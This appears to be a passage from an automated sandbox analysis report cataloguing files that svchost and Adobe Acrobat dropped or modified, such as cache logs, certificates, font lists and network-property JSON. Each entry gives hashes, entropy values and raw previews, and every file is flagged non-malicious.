                                                                                SHA-256:5BBE037A3C8750D819E5BA089C254978483508F2E588A50A05934629D1EE4CFB
                                                                                SHA-512:6514080B5838317B9D391A5745EE3AA1CCC5B3EE930D66F042AEF4A29160312C0C4DA51607D6C21E780C8636CA3CFFF1996F0757DB2A4E776839650A8C87B2A8
                                                                                Malicious:false
                                                                                Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9adb7dd2, page size 16384, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.6584302184674243
                                                                                Encrypted:false
                                                                                SSDEEP:1536:5SB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:5aza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                                MD5:E912F73E23D28A841F77FC79B4317C70
                                                                                SHA1:BAB23EDCA2E869C957799D651ACDF18D699483F8
                                                                                SHA-256:DF045EA6527F533CDDA59D991B66E53CF171E6D27360AF7B5B2D7160CFB8C866
                                                                                SHA-512:82C0B19B377B18B6856DEAB08D80BEE0EB91C37FFE61A2F059359339B5375DA9B8D771A91994546F49FE35E1FB5521BE18A209E190FFEFF201F165E4C38A6712
                                                                                Malicious:false
                                                                                Preview:..}.... ...............X\...;...{......................T.~.....;....}.......}..h.|.....;....}..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................8.l.;....}..................~.-.;....}...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):16384
                                                                                Entropy (8bit):0.07886501275490869
                                                                                Encrypted:false
                                                                                SSDEEP:3:Sll/OetYe8pXc//aLebWw//HKRa//all58Kgvvl/QoeP/ll:S//rzAXc/fWw//Kc/Gz8KgR+t
                                                                                MD5:80C365A5A38D0E1341751C4AC6645D20
                                                                                SHA1:32C50975091F282DC67382C374D0D14229D8FB26
                                                                                SHA-256:4B01E71EDBE3CFA4DB0403F62268F5095FC0FA875948A69DD75D4C508B6A04E4
                                                                                SHA-512:D871ABFCB3FF32AC269E5A4781BE7F073FC5A99BC79BD7B26EF174C48C6BD06B2C36EBE5A5DE52CD07B77BCA4F5C77E800AB69CBB42792747207128E62D7DDC1
                                                                                Malicious:false
                                                                                Preview:.L.......................................;...{.......}..;....}..........;....}..;....}.. ...;....}..................~.-.;....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):294
                                                                                Entropy (8bit):5.175258605860704
                                                                                Encrypted:false
                                                                                SSDEEP:6:iO8IJUVOq2P92nKuAl9OmbnIFUtWIwZZmwoIwzkwO92nKuAl9OmbjLJ:75JUAv4HAahFUtTwZ/dwz5LHAaSJ
                                                                                MD5:A43FC6F0403623AB1D3D2D326C68BFFC
                                                                                SHA1:951C565BDFE2B4FF401E6B20DE40D7644D66D80B
                                                                                SHA-256:CBF492891991A48E9C7B5714E0B78C75854F23924BAB35B94E06CB70CFE535B2
                                                                                SHA-512:7C2554A4E6991F707E0F86AA13C2B0D29E71CEC9CB57AD0F02D4EB121877DE0E4DD2617C40ED3EC8BAEE9F5D95CFC58D7FDB43D155EED844FC17CB735F910454
                                                                                Malicious:false
                                                                                Preview:2025/01/14-04:03:45.693 1c10 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-04:03:45.695 1c10 Recovering log #3.2025/01/14-04:03:45.695 1c10 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):294
                                                                                Entropy (8bit):5.175258605860704
                                                                                Encrypted:false
                                                                                SSDEEP:6:iO8IJUVOq2P92nKuAl9OmbnIFUtWIwZZmwoIwzkwO92nKuAl9OmbjLJ:75JUAv4HAahFUtTwZ/dwz5LHAaSJ
                                                                                MD5:A43FC6F0403623AB1D3D2D326C68BFFC
                                                                                SHA1:951C565BDFE2B4FF401E6B20DE40D7644D66D80B
                                                                                SHA-256:CBF492891991A48E9C7B5714E0B78C75854F23924BAB35B94E06CB70CFE535B2
                                                                                SHA-512:7C2554A4E6991F707E0F86AA13C2B0D29E71CEC9CB57AD0F02D4EB121877DE0E4DD2617C40ED3EC8BAEE9F5D95CFC58D7FDB43D155EED844FC17CB735F910454
                                                                                Malicious:false
                                                                                Preview:2025/01/14-04:03:45.693 1c10 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-04:03:45.695 1c10 Recovering log #3.2025/01/14-04:03:45.695 1c10 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):338
                                                                                Entropy (8bit):5.189489115601243
                                                                                Encrypted:false
                                                                                SSDEEP:6:iO8HXF34q2P92nKuAl9Ombzo2jMGIFUtWUzJZmwoUzDkwO92nKuAl9Ombzo2jMmd:7gIv4HAa8uFUtp/15LHAa8RJ
                                                                                MD5:B8712B99C718C4EF69F1AD432CD808BF
                                                                                SHA1:ADE00E46A59A3B86DFB4858D51AE18F19C75E27E
                                                                                SHA-256:38FAE4686B01C2AE8E10CB7783E6C2577F2205E8F9A96AA61CC4E009867DF585
                                                                                SHA-512:4C24DC33909A2F9515088AC2F08ACAF04C9022D547014A39F4F2C36B995BDD4D4EF856EB737A4D988ACF17BDA69AEE164C63F6FEF9A07EC572DA6307AA0706F1
                                                                                Malicious:false
                                                                                Preview:2025/01/14-04:03:45.762 1c80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/14-04:03:45.763 1c80 Recovering log #3.2025/01/14-04:03:45.763 1c80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):338
                                                                                Entropy (8bit):5.189489115601243
                                                                                Encrypted:false
                                                                                SSDEEP:6:iO8HXF34q2P92nKuAl9Ombzo2jMGIFUtWUzJZmwoUzDkwO92nKuAl9Ombzo2jMmd:7gIv4HAa8uFUtp/15LHAa8RJ
                                                                                MD5:B8712B99C718C4EF69F1AD432CD808BF
                                                                                SHA1:ADE00E46A59A3B86DFB4858D51AE18F19C75E27E
                                                                                SHA-256:38FAE4686B01C2AE8E10CB7783E6C2577F2205E8F9A96AA61CC4E009867DF585
                                                                                SHA-512:4C24DC33909A2F9515088AC2F08ACAF04C9022D547014A39F4F2C36B995BDD4D4EF856EB737A4D988ACF17BDA69AEE164C63F6FEF9A07EC572DA6307AA0706F1
                                                                                Malicious:false
                                                                                Preview:2025/01/14-04:03:45.762 1c80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/14-04:03:45.763 1c80 Recovering log #3.2025/01/14-04:03:45.763 1c80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:JSON data
                                                                                Category:modified
                                                                                Size (bytes):508
                                                                                Entropy (8bit):5.04549350217066
                                                                                Encrypted:false
                                                                                SSDEEP:12:YH/um3RA8sq0/XhsBdOg2HLcaq3QYiubxnP7E4T3OF+:Y2sRdsBidMHy3QYhbxP7nbI+
                                                                                MD5:CA981FFA0C4489F78B28EE071BF6046E
                                                                                SHA1:0C58588900BB221C3F7E7D0F736756E47BFEEBC5
                                                                                SHA-256:1ED6E70202B6D80B4747A55401A3115E1FF7CE995462F28ED4549C0B4D5D3F67
                                                                                SHA-512:3D368C3F765681B92E3896402642B7520C8AA0D1DE7F9787FD6CDDB03BE284D88546CC4CF52BD92A12DA855456B66326BF8AAB39AA7EF3C294849C51B8FB38D6
                                                                                Malicious:false
                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381405435811764","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":128338},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):508
                                                                                Entropy (8bit):5.04549350217066
                                                                                Encrypted:false
                                                                                SSDEEP:12:YH/um3RA8sq0/XhsBdOg2HLcaq3QYiubxnP7E4T3OF+:Y2sRdsBidMHy3QYhbxP7nbI+
                                                                                MD5:CA981FFA0C4489F78B28EE071BF6046E
                                                                                SHA1:0C58588900BB221C3F7E7D0F736756E47BFEEBC5
                                                                                SHA-256:1ED6E70202B6D80B4747A55401A3115E1FF7CE995462F28ED4549C0B4D5D3F67
                                                                                SHA-512:3D368C3F765681B92E3896402642B7520C8AA0D1DE7F9787FD6CDDB03BE284D88546CC4CF52BD92A12DA855456B66326BF8AAB39AA7EF3C294849C51B8FB38D6
                                                                                Malicious:false
                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381405435811764","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":128338},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):4099
                                                                                Entropy (8bit):5.2386879153174615
                                                                                Encrypted:false
                                                                                SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUOvsJS/X:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNL9
                                                                                MD5:ED47005F8485C26DFBE77EBD9C7A6271
                                                                                SHA1:471D73AC9C60DDEE50AD100D4287FA13E6EE14C0
                                                                                SHA-256:0D7CC2950E254C78CC32D884C393CE17643D5F3BEBB99486F32E256E115B26F7
                                                                                SHA-512:EDA4FD035C0EF00EE3B4E1554BFC57DC9524026FFB40330DD7176A531E290479F236267B3750E5732DEE9B947E00461A81E05E1314986A715C3D946CEE2C08D0
                                                                                Malicious:false
                                                                                Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):326
                                                                                Entropy (8bit):5.161586842742914
                                                                                Encrypted:false
                                                                                SSDEEP:6:iO87Kv4q2P92nKuAl9OmbzNMxIFUtWYF3JZmwoYF3DkwO92nKuAl9OmbzNMFLJ:7i7v4HAa8jFUtHZ/Zz5LHAa84J
                                                                                MD5:BE5D0269976F529481D62014057645ED
                                                                                SHA1:719D13A6C656977CAFD004FB702756CAAFD02748
                                                                                SHA-256:636CC9FD938BF3C0ECD9400C2A3F804D9D419ED77E5E9381E9CF72E3394AE0DE
                                                                                SHA-512:97D4CAC1ED17AC594BE663A1C827E70C0F5837152E13226BB5CFFDD94198ABFD5061155F5295B2223024E7A21B523CFE74F34E74A5731A75961624C1AD27264F
                                                                                Malicious:false
                                                                                Preview:2025/01/14-04:03:45.949 1c80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/14-04:03:45.950 1c80 Recovering log #3.2025/01/14-04:03:45.950 1c80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):326
                                                                                Entropy (8bit):5.161586842742914
                                                                                Encrypted:false
                                                                                SSDEEP:6:iO87Kv4q2P92nKuAl9OmbzNMxIFUtWYF3JZmwoYF3DkwO92nKuAl9OmbzNMFLJ:7i7v4HAa8jFUtHZ/Zz5LHAa84J
                                                                                MD5:BE5D0269976F529481D62014057645ED
                                                                                SHA1:719D13A6C656977CAFD004FB702756CAAFD02748
                                                                                SHA-256:636CC9FD938BF3C0ECD9400C2A3F804D9D419ED77E5E9381E9CF72E3394AE0DE
                                                                                SHA-512:97D4CAC1ED17AC594BE663A1C827E70C0F5837152E13226BB5CFFDD94198ABFD5061155F5295B2223024E7A21B523CFE74F34E74A5731A75961624C1AD27264F
                                                                                Malicious:false
                                                                                Preview:2025/01/14-04:03:45.949 1c80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/14-04:03:45.950 1c80 Recovering log #3.2025/01/14-04:03:45.950 1c80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:Certificate, Version=3
                                                                                Category:dropped
                                                                                Size (bytes):1391
                                                                                Entropy (8bit):7.705940075877404
                                                                                Encrypted:false
                                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                Malicious:false
                                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                Category:dropped
                                                                                Size (bytes):71954
                                                                                Entropy (8bit):7.996617769952133
                                                                                Encrypted:true
                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                Malicious:false
                                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):192
                                                                                Entropy (8bit):2.728204828358771
                                                                                Encrypted:false
                                                                                SSDEEP:3:kkFkl+81lfllXlE/HT8k3h1NNX8RolJuRdxLlGB9lQRYwpDdt:kKn+mT8YRNMa8RdWBwRd
                                                                                MD5:84030DECB9537BD56851EAD0797FD34F
                                                                                SHA1:03CE02063CFAF187CBA87B56BD1C89381A55579A
                                                                                SHA-256:C689165D807F3199DB1CBE94C0B76202E655B6F90576155A1733BD8C1A8F83B7
                                                                                SHA-512:59C35723D8C66616F27EE9E6A7C5A37B36CA8B8C45D12CA800B00B1FB91D12A57CFB8B137D211D19C0A9FA2DEF2B1582E671E1B1A3C5356A6C3770BEC7A5D69C
                                                                                Malicious:false
                                                                                Preview:p...... .........Y.=cf..(....................................................... ..........W....f...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):328
                                                                                Entropy (8bit):3.2368928658074476
                                                                                Encrypted:false
                                                                                SSDEEP:6:kKHiz9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:KKDImsLNkPlE99SNxAhUe/3
                                                                                MD5:EAE2A52F341D16A949234DF4BAC2C1D7
                                                                                SHA1:72A9CB1069FBD6AEB52C3694C8D6B416DE838F87
                                                                                SHA-256:36918089A9BA8F009FA5D0A52E2CB16A67DB47E25AF25698569E99D16D420A4A
                                                                                SHA-512:926CFE4256B32013F92320C4D4749552D044373747BDD8810B9BAF4A151A0CC583A1562DDDA369BBD036B93508F5ADF600D3F2E7F9D54DEFD4331FE446A5F860
                                                                                Malicious:false
                                                                                Preview:p...... ........`@.>cf..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:PostScript document text
                                                                                Category:dropped
                                                                                Size (bytes):1233
                                                                                Entropy (8bit):5.233980037532449
                                                                                Encrypted:false
                                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                Malicious:false
                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:PostScript document text
                                                                                Category:dropped
                                                                                Size (bytes):1233
                                                                                Entropy (8bit):5.233980037532449
                                                                                Encrypted:false
                                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                Malicious:false
                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:PostScript document text
                                                                                Category:dropped
                                                                                Size (bytes):1233
                                                                                Entropy (8bit):5.233980037532449
                                                                                Encrypted:false
                                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                Malicious:false
                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:PostScript document text
                                                                                Category:dropped
                                                                                Size (bytes):10880
                                                                                Entropy (8bit):5.214360287289079
                                                                                Encrypted:false
                                                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
